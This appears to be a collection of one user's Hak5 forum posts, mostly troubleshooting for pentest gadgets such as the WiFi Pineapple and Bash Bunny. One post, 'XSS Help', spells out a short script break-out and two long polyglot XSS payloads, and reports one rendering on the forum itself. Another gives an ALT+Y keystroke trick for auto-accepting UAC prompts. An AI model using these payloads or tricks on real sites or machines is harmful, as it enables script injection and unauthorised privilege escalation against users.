[Modules Requests Discussion]

A Krack module would be nice - - - -just putting it out there 

[Tools used to identify web application software and version]

Just saw that you already mention Builtwith, That's who I use to profile things like this. 

https://builtwith.com/hak5.com

They also have a browser plugin, It's very easy to use their API or just scrape for an app you would write yourself. 

I also use TCPIPUtils for looking up networking info, (subdomains etc)

https://www.tcpiputils.com/browse/domain/hak5.com

I then also do a few other things, but builtwith and TCPIPUtlis  are my main 2

[XSS Help]

Also, I would suggest looking in the console of your browser for errors when injecting. 

As already mentioned without knowing the app or js/html of page it's hard to give a working payload

However, you can try either 

-->'";</ScriPT><sCriPt><confirm()</scRiPt> 

Which may better break out of the HTML and is nice and short (similar to what you tried but I included single and double quotes and also the end of a comment just in case you end up in a comment section. 

Or you can try a polyglot injection payload, (these will usually set off a WebApp Firewall but feel free to try)

javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>"><img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" 

Or 

jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--

which are both attempting to do the same thing. 

Good luck . 

 

*****

EDIT

While it's not my intention to pop alerts on the hak5 forum, you can see that one of the polyglots is working as planned and is breaking out of tags to show a broken image,

This is the equivalent of <img src="x" />

From here you would just need to tweak the code to pop an alert on a broken image, remember to read the console and attempt to bypassing protections.

onerror=confirm() or something similar for a basic pop on a broken image.

****

 

[Missing old Hak5]

I think you guys are missing the R&D costs, 

If you look at Seytonic he pushes (or sells) Malduino but the Malduino uses DuckyScript as it's language. 

Who invented DuckyScript . Hak5 , 

OKay so it's not massively hard to come up with a new simple scripting language or even using the Malduino for USB automation, but no one else did it in a small easy to use package. 

That's what Hak5 brings, ease of use and some resemblance of support (I say resemblance as most of the support is from the community so it's hit or miss) . Sure you can do a lot of the pineapple stuff via a Linux OS with your network cards in Promiscuous mode but the Pineapples just give you a nice small package which to carry out your engagement. 

Seytonic is great and his guides are awesome for those with less cash, but lots of Hak5 customers are businesses/Govt agencies or just people with a passion for security who don't mind paying a little extra for the community. 

Hak5 if anything has been a bit of victim of its success and its customer base grew massively over the last few years (pineapple5 onwards) and it seems only now the dev team is beginning to catch up to cope with that larger customer expectation. Bringing Seb was a good start back at the start of Pineapple5, but he and Darren have always been swamped. For example almost 2 weeks after the source for Kracked was leaked (openly available) which is the biggest thing to happen to WIFI in about 10 years , The pineapples still haven't got modules/new firmware (in fact while I'm on it the firmware is over a year old)

Lets hope with the larger Dev team things get better.

[General TETRA Discussion]

Does anyone know anything about that "Friday thing" mentioned in today's Hak5 video? or what I'm guessing is a new PineApple firmware release or at least a new Krack module

****EDIT****  (after watching it back it seems that the Friday thing may have been last weeks Packet Squirrel announcement, I watched the recorded streams but didn't see anything new pineapple or Krack related)

 

[[RELEASE] Bash Bunny 1.1]

It never goes through the upgrade process, just goes straight from green to blinking blue. 

I'll try and do a recovery

 

**EDIT**

All good after the recovery, device must have been in a weird state, 

for anyone else who gets same issue to fix, 

insert and pull it out as soon as the green light turns off (do this 3 times) 

on the 4th insert it will go into recovery mode. 

Once this is done remove the bunny (use the safe removal feature on windows) 

and then making sure that you have the file still in root insert the bunny again and it will flash the new firmware.

As LVT mentioned above after the flash of new firmware you should have a text file called version.txt inside should be 1.1_228

 

PS LowValueTarget thanks for the help and advice above :-)

[[RELEASE] Bash Bunny 1.1]

Nope that's missing. :-(

[[RELEASE] Bash Bunny 1.1]

is there a way to tell the version from within putty as I don't think my device is updating correctly?

I'm thinking something like a version command which would show current firmware installed. 

My banner is currently 

Linux bunny 3.4.39 #130 SMP PREEMPT Fri Feb 10 14:24:25 CST 2017 armv7l
           _____  _____  _____  _____     _____  _____  _____  _____  __ __
 (\___/)  | __  ||  _  ||   __||  |  |   | __  ||  |  ||   | ||   | ||  |  |
 (='.'=)  | __ -||     ||__   ||     |   | __ -||  |  || | | || | | ||_   _|
 (")_(")  |_____||__|__||_____||__|__|   |_____||_____||_|___||_|___|  |_|
 Bash Bunny by Hak5     USB Attack/Automation Platform
 

[Where do I find Sample Scripts?]

I think the official launch date of BashBunny is 2nd March or at least that's when the launch party is scheduled for , so I would expect the payloads repository to open in the next day or so

[WIndows CMD Detect Connected WIFI Command]

Darren has it in his code , however netsh wlan sh net mode=bssid should do the same thing I think. 

Just take SSID 1 and store it as a variable to be later used, or select string if you want to directly grab the text from the output

Something like 

$ConnectedSSID= netsh wlan sh net mode=bssid
$Output= $ConnectedSSID| Select-String -Pattern 'SSID 1 :'
$Output -replace 'SSID 1 :'

or look at using a regex.

By the way I'm using Powershell above as Darren does in his script, is there a reason why you are sticking to Command only?

[Auto Accept UAC from Run Box??]

Most people just put 

ALT+Y as the next line which will auto accept the box. 

[My new case for my rubbber ducky]

It would be rude not to :-)

http://www.zazzle.com/rubber_ducky_usb_flash_drive_8gb-256084844831473678

I ordered the pink one as I figured it looks less ominous, I just love how blatant and yet cute the duck now becomes. 

I'm not selling them , however once I came across the link I thought I would share.   

I've no idea if the seller is even are that the other type of Rubber ducky exists (seems great that she is using the same USB shell)

You could also do this yourself with some sticky wrap I'm guessing. 

[General Lan Turtle Discussion]

Not sure what the issue is, but you could always try a manual update via

https://downloads.lanturtle.com/

See http://lanturtle.com/wiki/#!index.md#Manually_Upgrading for instructions. 

[Looking for someone who would Skype with me]

In reply to the OP I'll send you a Skype contact request thats if you still need help.

As for something to grep for interesting information in traffic you should look for the module called grep :-)

[[Official] LogManager]

Just wanted to say this I love this mod, while its simple in what it does.

Its the one I use the most (obviously other mods are running which are logging) however the logmanager is my goto page on the new V6 devices.

[Scheduled Server Downtime]

something big this way cometh :-)

[Stability issues with Red is wlan1mon, when being disabled and tethering stopping.]

I found my issue with stability is power related and I can keep the device slightly more stable if I don't run nGrep or UrlSnarf.

So lighter load on the device the more stable. Seems to match what Darren said in previous threads, I'm going to purchase another battery to test with 2 plugged in.

UrlSnarf will kill the redlight on the device (mon mode I think) right away.

[Stability issues with Red is wlan1mon, when being disabled and tethering stopping.]

If I'm reading right you are using 3 power bricks?,

2 on the Y cable into UART socket

and another into the Eth socket

?

[Stability issues with Red is wlan1mon, when being disabled and tethering stopping.]

I'm running my device from a USB power source (battery for charging), and every 3-5 mins the red light will turn off and the device get into an unstable state. I'm guessing its due to power draw on the device being too much for my power brick.

I'm using the LimeAid Blast L180X (1800mAh) with 3.1Amps and 10V total output.

So when using both USB ports I'm giving my device 3.1Amps (2.1port1 1.0port2) and 10V (5V from each port)

I know the Tetra needs 12V and 1.5Amps,

So I was wondering if my powerbrick should work, or do I need to find a new solution?,

I'm wondering what everone else is using for Tetra mobile (besides a Nano? :-))

My only next hope is to try and use something like my LegionMeter , however not sure just pumping more wattage/mAh will do the trick

[How often does one need to upgrade the pineapple?]

On the Nano you can use a mobile if you have signal strength from your provider where you are wanting to test from, or you can use the Alpha as you suggested.

[Resetting the Nano Splash Screens]

No example attached in your post that I could see, My Nano has never "fully finished" a firmware update, it just gets stuck on the updating screen,.

I also have issues with mine and like you have only been able do about 50% of what it should, (PineAP doesn't work) , It never logs sniffed networks , Recon works though and can detect networks , but PineAP will never log any.

As for that screen

I normally wait about 20-30 minutes just to be sure and then force a reboot and it appears to have upgraded.

see my pic of the screen it gets stuck on when it starts an update.

[What linux?]

Does it connect if you tether via your phone?,

AFAIK there are no drivers included in the pineapple for external WIFI cards, so plugging in an external card for client mode won't work,

Network sharing should work just fine.

Darren posted a couple of videos on how to set up the pineapple one for Android and the other for Linux = http://www.wifipineapple.com/nano

[[Release] 2.4.0 - Codename: Tractosaurus Rex!]

I think the current plan is to move the MK5 to the same software platform as a MK6 , however no date has been given for when this will occur.

So I doubt any new firmware releases will happen and the team will instead focus on the move from MK5 software platform to the MK6 software platform. (new API, modules instead of infusions and new UI for web etc)

Not sure if any of that would that will fix your reboots.

[Shipping Delay for WiFi Pineapple TETRA]

+1 to other posts , would much rather wait for a "tweaked" product that performs better than one that performs less than expected.

I still have the Nano to play with anyway :-)

[Feedback from using Nano]

Firstly amazing change from the MK5 all positive improvements. so much easier to use and loving the new interface, much easier to set up PineAP and get basic set up running. Congrats to the team.

Improvements (only 3 I can think of)

1) Possible faulty MicroUSB cable? (or just not supported) I plugged in the cable that came with the Nano and tether option was greyed out with the message that "No USB Connected", if my cable wasn't faulty and was not supported then the whole tethering issue could be a big pain for the team.

The thing that led me to believe that the cable might be at fault was that I was sure that I had USB tethered my device which is a OnePlusOne before.

So I switched to the cable that came with the phone (Red Flat USB Cable) and voila USB tethering just fine, so my device was not playing nice with the cable that came with the Nano, I write this as advice for people to try other cables, before giving up on tethering.

By the way I'm running CyanoGenMod 12.1

I have a couple of OnePlus Ones in the house so my next project will be to install NetHunter over the holidays.

2) Next the part about blue light being static after flashing, mine was static but would give a tiny flash every 10 seconds or so, so I waited about 15-20 minutes just to be sure. my point is that a future improvement would be different colored LED to signify different statuses, or fixing issue in software but actually having the page refresh as the text states (once a successful flash has been detected)

3) And lastly an improvement would be some way to notify the user that the radios have been disabled / enabled when pressing the reset button once. Sure the feedback from the reset button is quite good , however again different led color or flash pattern to let the user know. this way they could tell the device has registered there actions.

All small things , but thought they might come in handy for the team as user feedback or users going through set up for the first time.